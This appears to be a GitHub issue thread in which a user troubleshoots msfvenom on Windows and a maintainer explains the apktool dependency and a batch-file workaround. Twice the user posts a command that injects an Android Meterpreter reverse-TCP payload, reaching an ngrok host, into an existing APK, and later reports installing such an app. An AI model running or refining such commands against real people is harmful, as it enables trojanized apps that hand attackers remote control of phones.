### ISSUE TITLE
Hello, someone should please help me out! I want to create a payload on my command prompt. I entered:

### ISSUE THREAD

**Issue by Samshow-cyber** [rapid7/metasploit-payloads#543]
Hello, someone should please help me out! I want to create a payload on my command prompt. I entered:

C:\users\USER\Downloads>msfvenom -× mymtnapp.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=(port number) -o /users/USER/Desktop/mycreation.apk

I got an error message saying: apktool not found........

Why is this happening?

_Originally posted by @Samshow-cyber in https://github.com/rapid7/metasploit-framework/issues/11024#issuecomment-1049351242_

**Comment by bcoles** [comment]
`msfvenom` requires `apktool` to modify APK files. `apktool` must be in your `PATH`.

**Comment by Samshow-cyber** [comment]
@bcoles How can I make the apktool be in my path?

**Comment by Samshow-cyber** [comment]
Please explain what to do

**Comment by bcoles** [comment]
https://github.com/rapid7/metasploit-framework/issues/13264

**Comment by Samshow-cyber** [comment]
So do you mean I will download the apktool on my system?

**Comment by Samshow-cyber** [comment]
I solved the apktool issue after making some researches. But I have another issue ongoing.

I'm trying to add payload to an apk file. I followed the normal command format and processed the command in the CMD. This is what I got:

Using apk template: theapk.apk
[-] No platform was selected, choosing Msf::module::platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from payload

And after that, nothing more... the command prompt it still processing (still blinking the white dash)

Please why is this happening? Please help!

**Comment by Samshow-cyber** [comment]
I solved the apktool issue after making some researches. But I have another issue ongoing.

I'm trying to add payload to an apk file. I followed the normal command format and processed the command in the CMD. This is what I got:

Using apk template: theapk.apk
[-] No platform was selected, choosing Msf::module::platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from payload

And after that, nothing more... the command prompt it still processing (still blinking the white dash)

Please why is this happening? Please help!

**Comment by Samshow-cyber** [comment]
@bcoles I solved the apktool issue after making some researches. But I have another issue ongoing.

I'm trying to add payload to an apk file. I followed the normal command format and processed the command in the CMD. This is what I got:

```
Using apk template: theapk.apk
[-] No platform was selected, choosing Msf::module::platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from payload
```

And after that, nothing more... the command prompt it still processing (still blinking the white dash)

Please why is this happening? Please help!

**Comment by bcoles** [comment]
> I'm trying to add payload to an apk file. I followed the normal command format and processed the command in the CMD. This is what I got:

what command did you use

**Comment by Samshow-cyber** [comment]
I used this:

`C:\users\USER\Desktop>msfvenom -× mymtnapp.apk -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=(port number) -o /users/USER/Desktop/mycreation.apk`

**Comment by Samshow-cyber** [comment]
![20220225_005808](https://user-images.githubusercontent.com/100323325/155627496-2dcc40e1-2d33-4809-bb82-10a75f086417.jpg)
This is a picture... it has been there for about 1hr ago

**Comment by Samshow-cyber** [comment]
@bcoles @adfoster-r7 what do you think happened?

**Comment by Samshow-cyber** [comment]
@bcoles I'm seriously waiting on your response please

**Comment by bcoles** [comment]
> @bcoles I solved the apktool issue after making some researches. But I have another issue ongoing.
> 
> I'm trying to add payload to an apk file. I followed the normal command format and processed the command in the CMD. This is what I got:
> 
> ```
> Using apk template: theapk.apk
> [-] No platform was selected, choosing Msf::module::platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from payload
> ```
> 
> And after that, nothing more... the command prompt it still processing (still blinking the white dash)
> 
> Please why is this happening? Please help!

Freezes for me too. Tested on Windows 11. Pressing ctrl+c simply prints `Error:`.

![apktool error](https://user-images.githubusercontent.com/434827/155835010-cd3d50ae-6657-42fd-afc3-5d5628f99d86.png)

It is freezing when attempting to execute `apktool -version`. Given that `msfvenom` makes multiple references to `apktool` (not `apktool.bat` I suspect `msfvenom` is not expected to work with apk files on Windows.

Looks like a dupe of https://github.com/rapid7/metasploit-framework/issues/15219 which is a dupe of https://github.com/rapid7/metasploit-framework/issues/13289.

**Comment by bcoles** [comment]
`apktool.bat` for Windows pauses if run in non-interactive mode.

A simple workaround is to `exit` before this check, or simply remove the check:

```
exit
rem Pause when ran non interactively
for /f "tokens=2" %%# in ("%cmdcmdline%") do if /i "%%#" equ "/c" pause
```

However, I still suggest using Linux. If you do want to use Windows, you'll also have to set up `jarsigner`, `zipalign` and `keytool`.

**Comment by Samshow-cyber** [comment]
@bcoles Hello! I need help. I injected a payload to a trusted apk and it was successful. I installed the apk on my android device and it was successfully installed but when I opened the app, it says webpage not available.

Why is this happening? Please anyone. Thanks

**Comment by Samshow-cyber** [comment]
@bcoles Hello! I need help. I injected a payload to a trusted apk and it was successful. I installed the apk on my android device and it was successfully installed but when I opened the app, it says webpage not available.

Why is this happening? Please anyone. Thanks

**Comment by Samshow-cyber** [comment]
> `apktool.bat` for Windows pauses if run in non-interactive mode.
> 
> A simple workaround is to `exit` before this check, or simply remove the check:
> 
> ```
> exit
> rem Pause when ran non interactively
> for /f "tokens=2" %%# in ("%cmdcmdline%") do if /i "%%#" equ "/c" pause
> ```
> 
> However, I still suggest using Linux. If you do want to use Windows, you'll also have to set up `jarsigner`, `zipalign` and `keytool`.

Yeah I have decided to go for Linux mint on virtual machine and it's working fine. Just facing an issue which I opened in NEW ISSUE... You replied once, I replied back and you haven't reply. Still awaiting your response though.
Thanks @bcoles
